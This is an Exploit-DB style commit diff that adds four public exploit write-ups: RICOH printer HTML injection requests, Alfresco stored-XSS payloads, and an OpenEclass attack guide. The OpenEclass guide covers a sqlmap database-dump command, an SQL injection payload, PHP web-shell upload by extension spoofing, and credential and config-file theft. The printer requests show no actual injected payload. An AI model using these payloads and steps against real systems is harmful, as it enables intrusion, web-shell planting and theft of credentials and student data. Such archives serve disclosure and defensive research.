DB: 2020-03-04
4 changes to exploits/shellcodes RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection Alfresco 5.2.4 - Persistent Cross-Site Scripting GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
This commit is contained in:
parent
afe5797b88
commit
d85ad29bbc
5 changed files with 345 additions and 0 deletions
73
exploits/hardware/webapps/48161.txt
Normal file
73
exploits/hardware/webapps/48161.txt
Normal file
|
@ -0,0 +1,73 @@
|
||||||
|
# Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
|
||||||
|
# Discovery by: Paulina Girón
|
||||||
|
# Discovery Date: 2020-03-02
|
||||||
|
# Vendor Homepage: https://www.ricoh.com/
|
||||||
|
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re2/model/sp52s/sp52s.htm
|
||||||
|
# Product Version: RICOH Aficio SP 5200S Printer
|
||||||
|
# Vulnerability Type: Code Injection - HTML Injection
|
||||||
|
|
||||||
|
# Steps to Produce the HTML Injection:
|
||||||
|
|
||||||
|
#1.- HTTP POST Request 'adrsGetUser.cgi':
|
||||||
|
|
||||||
|
POST /web/entry/es/address/adrsGetUser.cgi HTTP/1.1
|
||||||
|
Host: xxx.xxx.xxx.xxx
|
||||||
|
Content-Length: 447
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Origin: http://xxx.xxx.xxx.xxx
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsList.cgi
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: es-ES,es;q=0.9
|
||||||
|
Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=13&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00005=ADRS_ENTRY_USER&00006=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00009=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER
|
||||||
|
|
||||||
|
#HTTP Response :
|
||||||
|
|
||||||
|
HTTP/1.0 200 OK
|
||||||
|
Date: Mon, 02 Mar 2020 15:15:59 GMT
|
||||||
|
Server: Web-Server/3.0
|
||||||
|
Content-Type: text/html; charset=UTF-8
|
||||||
|
Expires: Mon, 02 Mar 2020 15:15:59 GMT
|
||||||
|
Pragma: no-cache
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Set-Cookie: cookieOnOffChecker=on; path=/
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#2.- HTTP POST Request 'adrsSetUser.cgi':
|
||||||
|
|
||||||
|
POST /web/entry/es/address/adrsSetUser.cgi HTTP/1.1
|
||||||
|
Host: xxx.xxx.xxx.xxx
|
||||||
|
Content-Length: 611
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Origin: http://xxx.xxx.xxx.xxx
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsGetUser.cgi
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: es-ES,es;q=0.9
|
||||||
|
Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00012&entryNameIn=prueba&entryDisplayNameIn=prueba&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
|
||||||
|
|
||||||
|
#HTTP Response :
|
||||||
|
|
||||||
|
HTTP/1.0 200 OK
|
||||||
|
Date: Mon, 02 Mar 2020 15:17:10 GMT
|
||||||
|
Server: Web-Server/3.0
|
||||||
|
Content-Type: text/html; charset=UTF-8
|
||||||
|
Expires: Mon, 02 Mar 2020 15:17:10 GMT
|
||||||
|
Pragma: no-cache
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Set-Cookie: cookieOnOffChecker=on; path=/
|
||||||
|
Connection: close
|
73
exploits/hardware/webapps/48164.txt
Normal file
73
exploits/hardware/webapps/48164.txt
Normal file
|
@ -0,0 +1,73 @@
|
||||||
|
# Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
|
||||||
|
# Discovery by: Olga Villagran
|
||||||
|
# Discovery Date: 2020-03-02
|
||||||
|
# Vendor Homepage: https://www.ricoh.com/
|
||||||
|
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/rc3/model/sp52s/sp52s.htm?lang=es
|
||||||
|
# Product Version: RICOH Aficio SP 5210SF Printer
|
||||||
|
# Vulnerability Type: Code Injection - HTML Injection
|
||||||
|
|
||||||
|
# Steps to Produce the HTML Injection:
|
||||||
|
|
||||||
|
#1.- HTTP POST Request 'adrsGetUser.cgi':
|
||||||
|
|
||||||
|
POST /web/entry/en/address/adrsGetUser.cgi HTTP/1.1
|
||||||
|
Host: xxx.xxx.xxx.xxx
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsList.cgi
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 402
|
||||||
|
Connection: close
|
||||||
|
Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=8&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER&00012=ADRS_ENTRY_USER
|
||||||
|
|
||||||
|
|
||||||
|
#HTTP Response :
|
||||||
|
|
||||||
|
HTTP/1.0 200 OK
|
||||||
|
|
||||||
|
Date: Mon, 02 Mar 2020 22:22:44 GMT
|
||||||
|
Server: Web-Server/3.0
|
||||||
|
Content-Type: text/html; charset=UTF-8
|
||||||
|
Expires: Mon, 02 Mar 2020 22:22:44 GMT
|
||||||
|
Pragma: no-cache
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Set-Cookie: cookieOnOffChecker=on; path=/
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
|
||||||
|
#2.- HTTP POST Request 'adrsSetUser.cgi':
|
||||||
|
|
||||||
|
|
||||||
|
POST /web/entry/en/address/adrsSetUser.cgi HTTP/1.1
|
||||||
|
Host: xxx.xxx.xxx.xxx
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsGetUser.cgi
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 607
|
||||||
|
Connection: close
|
||||||
|
Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00005&entryNameIn=test&entryDisplayNameIn=test&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
|
||||||
|
|
||||||
|
|
||||||
|
#HTTP Response :
|
||||||
|
|
||||||
|
HTTP/1.0 200 OK
|
||||||
|
|
||||||
|
Date: Mon, 02 Mar 2020 22:23:10 GMT
|
||||||
|
Server: Web-Server/3.0
|
||||||
|
Content-Type: text/html; charset=UTF-8
|
||||||
|
Expires: Mon, 02 Mar 2020 22:23:10 GMT
|
||||||
|
Pragma: no-cache
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Set-Cookie: cookieOnOffChecker=on; path=/
|
||||||
|
Connection: close
|
79
exploits/php/webapps/48162.txt
Normal file
79
exploits/php/webapps/48162.txt
Normal file
|
@ -0,0 +1,79 @@
|
||||||
|
# Exploit Title: Alfresco 5.2.4 - Persistent Cross-Site Scripting
|
||||||
|
# Date: 2020-03-02
|
||||||
|
# Exploit Author: Romain LOISEL & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
|
||||||
|
# Vendor Homepage: https://www.alfresco.com/
|
||||||
|
# Software Link: https://www.alfresco.com/ecm-software
|
||||||
|
# Version: Alfresco before 5.2.4
|
||||||
|
# Tested on: 5.2.4
|
||||||
|
# CVE : CVE-2020-8776, CVE-2020-8777, CVE-2020-8778
|
||||||
|
# Security advisory: https://gitlab.com/snippets/1937042
|
||||||
|
|
||||||
|
|
||||||
|
### Stored XSS n°1 - Document URL - CVE-2020-8776 (found by Alexandre ZANNI)
|
||||||
|
|
||||||
|
Each file has a set of properties than can be edited by any authenticated user
|
||||||
|
that have write access on the project or the file.
|
||||||
|
|
||||||
|
The **URL** property of the file provided by the user is injected in the `href`
|
||||||
|
attribute of the HTML link without a proper escaping.
|
||||||
|
|
||||||
|
- Where? In URL property
|
||||||
|
- Payload: `" onmouseover="alert(document.cookie)"`
|
||||||
|
- Details: On the document explorer, the value is injected in a span tag. But on the detailed view of the file, it's inserted in the `href` attribute of a `a` tag. `http://` is prefixed before the payload provided by the user but can be bypassed. The generated vulnerable link will look like that:
|
||||||
|
```html
|
||||||
|
<a target="_blank" href="http://" onmouseover="alert(document.cookie)" "=" ">http://" onmouseover="alert(document.cookie)"</a>
|
||||||
|
```
|
||||||
|
- Privileges: It requires write privileges to store it, any user with read access can see it.
|
||||||
|
- Steps to reproduce:
|
||||||
|
1. Go to _Document Library_
|
||||||
|
2. Upload a file or click _Edit properties_ on an existing file
|
||||||
|
3. Enter the payload in the URL property
|
||||||
|
4. Click on the file title to go on the detailed page of the file
|
||||||
|
5. Hover the displayed link to trigger the XSS
|
||||||
|
|
||||||
|
### Stored XSS n°2 - User profile photo upload / Document viewing - CVE-2020-8777 (found by Alexandre ZANNI)
|
||||||
|
|
||||||
|
There is no file restriction for photo uploading in the user profile page.
|
||||||
|
Then the profile picture can be seen in the browser.
|
||||||
|
|
||||||
|
- Where? In user profile photo
|
||||||
|
- Payload:
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" standalone="no"?>
|
||||||
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||||
|
|
||||||
|
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||||||
|
<polygon id="triangle" points="0,0 0,200 200,200 200,0" fill="#FF6804" stroke="#000000"/>
|
||||||
|
<script type="text/javascript">
|
||||||
|
alert('XSS - Orange Cyberdefense');
|
||||||
|
</script>
|
||||||
|
</svg>
|
||||||
|
```
|
||||||
|
- Details: The XSS is not triggerred everywhere, only with the _View in browser_ feature.
|
||||||
|
- Privileges: Any authenticated user can store it or trigger it.
|
||||||
|
- Steps to reproduce:
|
||||||
|
1. Go to your user profile page (`/share/page/user/<username>/profile`)
|
||||||
|
2. In the _Photo_ section, click _Upload_ and upload the SVG payload file
|
||||||
|
3. Use the document browser or any dashboard to find the uploaded file
|
||||||
|
4. Click on the title to go to the detailed page of the file
|
||||||
|
5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
|
||||||
|
|
||||||
|
### Stored XSS n°3 - Generic file upload / Document viewing - CVE-2020-8778 (found by Romain LOISEL)
|
||||||
|
|
||||||
|
This is the generic version of the previous XSS. Uploading dangerous file types
|
||||||
|
is allowed and then they can be viewed to triggered the XSS. The difference
|
||||||
|
between the two is that this one requires right access on a project to upload
|
||||||
|
documents so the XSS is not exploitable with a read only account but the
|
||||||
|
previous one can be exploited by any user as any user is allowed to have a
|
||||||
|
profile photo.
|
||||||
|
|
||||||
|
- Where? Uploading a document anywhere
|
||||||
|
- Payload: any file type that can store and execute a JavaScript payload (eg. HTML, SVG, XML, etc.)
|
||||||
|
- Details: The XSS is triggerred only with the _View in browser_ feature.
|
||||||
|
- Privileges: Any authenticated user with write access to a project can store it and any user that have read access to the file or project can trigger it.
|
||||||
|
- Steps to reproduce:
|
||||||
|
1. Go to a project dashboard
|
||||||
|
2. IClick _Upload_ and upload a dangerous file
|
||||||
|
3. Use the document browser or any dashboard to find the uploaded file
|
||||||
|
4. Click on the title to go to the detailed page of the file
|
||||||
|
5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
|
116
exploits/php/webapps/48163.txt
Normal file
116
exploits/php/webapps/48163.txt
Normal file
|
@ -0,0 +1,116 @@
|
||||||
|
# Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
|
||||||
|
# Google Dork: intext:"© GUnet 2003-2007"
|
||||||
|
# Date: 2020-03-02
|
||||||
|
# Exploit Author: emaragkos
|
||||||
|
# Vendor Homepage: https://www.openeclass.org/
|
||||||
|
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
|
||||||
|
# Version: 1.7.3 (2007)
|
||||||
|
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
|
||||||
|
# CVE : -
|
||||||
|
|
||||||
|
Older versions are also vulnerable.
|
||||||
|
|
||||||
|
Source code:
|
||||||
|
http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
|
||||||
|
http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
|
||||||
|
|
||||||
|
Setup instructions:
|
||||||
|
http://download.openeclass.org/files/docs/1.7/Install.pdf
|
||||||
|
|
||||||
|
Changelog:
|
||||||
|
https://download.openeclass.org/files/docs/1.7/CHANGES.txt
|
||||||
|
|
||||||
|
Manual:
|
||||||
|
https://download.openeclass.org/files/docs/1.7/eClass.pdf
|
||||||
|
|
||||||
|
############################################################################
|
||||||
|
|
||||||
|
Unauthenticated Information Disclosure
|
||||||
|
|
||||||
|
System info
|
||||||
|
127.0.0.1/modules/admin/sysinfo
|
||||||
|
(powered by phpSysInfo 2.0 that is also vulnerable)
|
||||||
|
|
||||||
|
Web-App version info
|
||||||
|
127.0.0.1/README.txt
|
||||||
|
127.0.0.1/info/about.php
|
||||||
|
127.0.0.1/upgrade/CHANGES.txt
|
||||||
|
|
||||||
|
############################################################################
|
||||||
|
|
||||||
|
(Authenticated - Requires student account) - Error-Based SQLi
|
||||||
|
|
||||||
|
https://127.0.0.1/modules/agenda/myagenda.php?month=3&year=2020
|
||||||
|
|
||||||
|
sqlmap -u "https://127.0.0.1/modules/agenda/myagenda.php?month=2&year=2020" --batch --dump
|
||||||
|
|
||||||
|
---
|
||||||
|
Parameter: month (GET)
|
||||||
|
Type: error-based
|
||||||
|
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||||
|
Payload: month=5' AND (SELECT 9183 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9183=9183,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Hztw&year=2020'
|
||||||
|
---
|
||||||
|
|
||||||
|
Almost every parameter will be either error-based, boolean-based or time-based vulnerable.
|
||||||
|
If you have a student account I recommend using this error-based SQLi because you will get all the database content really faster.
|
||||||
|
If you dont have an account use the following exploit that exploits an unauthenticated time-based blind injection.
|
||||||
|
It will definately be a slower proccess but you will get the administrator account pretty fast and move on with exploiting other authenticated vulnerabilities.
|
||||||
|
https://www.exploit-db.com/exploits/48106
|
||||||
|
|
||||||
|
############################################################################
|
||||||
|
|
||||||
|
(Authenticated - Requires student account) - PHP upload file extension bypass
|
||||||
|
If you have a student account you can bypass file extension restrictions and upload a PHP shell.
|
||||||
|
Register as user if the application is configured to allow registrations or use an SQLi to find an account that already exists.
|
||||||
|
Start looking for a class that you can submit an exercise as a student.
|
||||||
|
Register in that class and navigate to submit you exercise.
|
||||||
|
If you try to upload a .php file it will be renamed to .phps to prevent execution.
|
||||||
|
You can upload your PHP shell by spoofing the extension simply by renaming your .php file to .php3 or .PhP
|
||||||
|
Once you have uploaded it, open your course directory and then add "work" directory at the end
|
||||||
|
Course link example: https://127.0.0.1/courses/CS101/
|
||||||
|
Course link becomes: https://127.0.0.1/courses/CS101/work/
|
||||||
|
Directory listing will most likely be enabled by default and you will be able to view the directories.
|
||||||
|
Your shell will be in one of the multiple random alphanumeric directories that look like this /4a0c01h2nad9b/
|
||||||
|
Final shell link will look like this: https://127.0.0.1/courses/CS101/work/4a0c01h2nad9b/shell.php3
|
||||||
|
|
||||||
|
The same method works with "groups" if you cant find a class that supports submitting an exercise.
|
||||||
|
https://127.0.0.1/modules/group/group.php
|
||||||
|
|
||||||
|
############################################################################
|
||||||
|
|
||||||
|
(Authenticated - Requires student account) - View assessments of other students
|
||||||
|
If you have a student account you can view uploaded assessments from other students before or after the deadline that the professor has set.
|
||||||
|
Find the course link you are interested in.
|
||||||
|
https://127.0.0.1/courses/CS101
|
||||||
|
Add "work" directory at the end
|
||||||
|
https://127.0.0.1/courses/CS101/work/
|
||||||
|
Directory listing will most likely be enabled by default and you will be able to view and download other students' uploaded assessments.
|
||||||
|
|
||||||
|
############################################################################
|
||||||
|
|
||||||
|
(Authenticated - Requires admin account) - Upload PHP files
|
||||||
|
|
||||||
|
You have to login to the platform as an administrator or user with admin rights.
|
||||||
|
You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the
|
||||||
|
following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results.
|
||||||
|
Once you have logged in as admin:
|
||||||
|
1) Navigate to 127.0.0.1/modules/course_info/restore_course.php
|
||||||
|
2) Upload your .php shell compressed in a .zip file
|
||||||
|
3) Ignore the error message
|
||||||
|
4) Your PHP file is now uploaded to 127.0.0.1/cources/tmpUnzipping/[your-shell-name].php
|
||||||
|
|
||||||
|
############################################################################
|
||||||
|
|
||||||
|
(Authenticated - Requires admin account) - phpMyAdmin Remote Access
|
||||||
|
|
||||||
|
127.0.0.1/modules/admin/mysql
|
||||||
|
phpMyAdmin 2.10.0.2 is installed by default and allows remote logins
|
||||||
|
Once you have uploaded your shell can view the config.php file that contains the mysql password
|
||||||
|
127.0.0.1/config/config.php
|
||||||
|
|
||||||
|
############################################################################
|
||||||
|
|
||||||
|
(Authenticated - Requires admin account) - Plaintext password storage
|
||||||
|
|
||||||
|
When logged in as admin you can view all registered users credentials as plaintext.
|
||||||
|
127.0.0.1/modules/admin/listusers.php
|
|
@ -42427,3 +42427,7 @@ id,file,description,date,author,type,platform,port
|
||||||
48155,exploits/hardware/webapps/48155.py,"TP LINK TL-WR849N - Remote Code Execution",2020-03-02,"Elber Tavares",webapps,hardware,
|
48155,exploits/hardware/webapps/48155.py,"TP LINK TL-WR849N - Remote Code Execution",2020-03-02,"Elber Tavares",webapps,hardware,
|
||||||
48158,exploits/hardware/webapps/48158.txt,"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)",2020-03-02,"Elber Tavares",webapps,hardware,
|
48158,exploits/hardware/webapps/48158.txt,"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)",2020-03-02,"Elber Tavares",webapps,hardware,
|
||||||
48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,
|
48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,
|
||||||
|
48161,exploits/hardware/webapps/48161.txt,"RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection",2020-03-03,"Paulina Girón",webapps,hardware,
|
||||||
|
48162,exploits/php/webapps/48162.txt,"Alfresco 5.2.4 - Persistent Cross-Site Scripting",2020-03-03,"Alexandre ZANNI",webapps,php,
|
||||||
|
48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,
|
||||||
|
48164,exploits/hardware/webapps/48164.txt,"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection",2020-03-03,"Olga Villagran",webapps,hardware,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue